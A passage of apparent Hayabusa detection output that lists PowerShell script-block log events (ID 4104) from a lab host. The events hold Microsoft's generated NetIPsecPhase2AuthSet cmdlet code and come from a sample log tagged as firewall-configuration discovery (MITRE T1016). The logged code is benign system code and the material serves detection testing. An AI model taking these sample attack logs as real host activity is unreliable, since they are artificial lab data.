[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', 
$__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] 
${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
